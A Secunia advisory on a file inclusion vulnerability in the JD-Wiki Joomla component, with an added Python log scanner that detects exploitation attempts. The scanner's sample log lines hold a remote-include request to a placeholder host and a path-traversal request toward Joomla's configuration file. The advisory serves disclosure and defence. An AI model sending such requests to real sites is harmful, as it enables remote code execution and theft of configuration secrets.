Joomla JD-Wiki Component File Inclusion Vulnerability

SECUNIA ADVISORY ID:
SA21389

VERIFY ADVISORY:
http://secunia.com/advisories/21389/

CRITICAL:
Highly critical

IMPACT:
System access

WHERE:
From remote

SOFTWARE:
JD-Wiki 1.x (component for Joomla)
http://secunia.com/product/11256/

DESCRIPTION:
jank0 has reported a vulnerability in the JD-Wiki component for
Joomla, which can be exploited by malicious people to compromise a
vulnerable system.

Input passed to the "mosConfig_absolute_path" parameter in
components/com_jd-wiki/lib/tpl/default/main.php isn't properly
verified before it is used to include files. This can be exploited
to include arbitrary files from external and local resources.

Successful exploitation requires that "register_globals" is enabled.
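To illustrate the detection side of this issue, here is an added example (not from the advisory or from the JD-Wiki project) that scans web-server log lines for requests that set "mosConfig_absolute_path" against the affected script and classifies what the include would reach. The combined log format, client addresses and parameter values are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script named in the advisory, and the Joomla configuration global that
# register_globals lets a request overwrite. A legitimate client never sends
# this parameter, so any request carrying it is worth an alert.
VULN_PATH = "components/com_jd-wiki/lib/tpl/default/main.php"
PARAM = "mosConfig_absolute_path"

# Minimal matcher for an Apache/nginx "combined" log line:
# client, timestamp, method, request target, status code.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

def classify_include(value):
    """Label what an attacker-supplied include prefix would resolve to."""
    v = value.strip()
    if re.match(r"^[a-z][a-z0-9+.-]*://", v, re.I):
        return "remote"       # URL wrapper: remote file inclusion
    if ".." in v or v.startswith("/"):
        return "local"        # traversal or absolute path: local file inclusion
    return "suspicious"       # still abnormal: a config global set from the request

def scan_log(lines):
    """Return (client, status, kind, value) for each request setting PARAM."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                       # not a combined-format line
        client, _ts, _method, target, status = m.groups()
        parts = urlsplit(target)           # split path from query string
        if not parts.path.endswith(VULN_PATH):
            continue
        values = parse_qs(parts.query).get(PARAM)   # parse_qs URL-decodes values
        if not values:
            continue
        hits.append((client, int(status), classify_include(values[0]), values[0]))
    return hits

# Constructed sample lines (documentation addresses), not real traffic.
SAMPLE = [
    '198.51.100.7 - - [09/Aug/2006:10:00:01 +0000] "GET /components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://203.0.113.5/x.txt HTTP/1.1" 200 512 "-" "-"',
    '198.51.100.7 - - [09/Aug/2006:10:00:02 +0000] "GET /components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=../../../../configuration.php HTTP/1.1" 200 1204 "-" "-"',
    '192.0.2.20 - - [09/Aug/2006:10:00:03 +0000] "GET /index.php?option=com_jd-wiki&Itemid=29 HTTP/1.1" 200 8000 "-" "-"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE):
        print(hit)
```

A 200 status on a flagged request is the case to escalate first: with register_globals on, it means the include was attempted with the supplied path, not rejected.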

SOLUTION:
Update to version 1.0.3:
http://forge.joomla.org/sf/frs/do/downloadFile/projects.joomladeveloping/frs.joomla_1_0_x.components/frs6415?dl=1

PROVIDED AND/OR DISCOVERED BY:
jank0

ORIGINAL ADVISORY:
http://www.joomladeveloping.org/component/option,com_jd-wp/Itemid,29/p,33/
http://milw0rm.com/exploits/2125
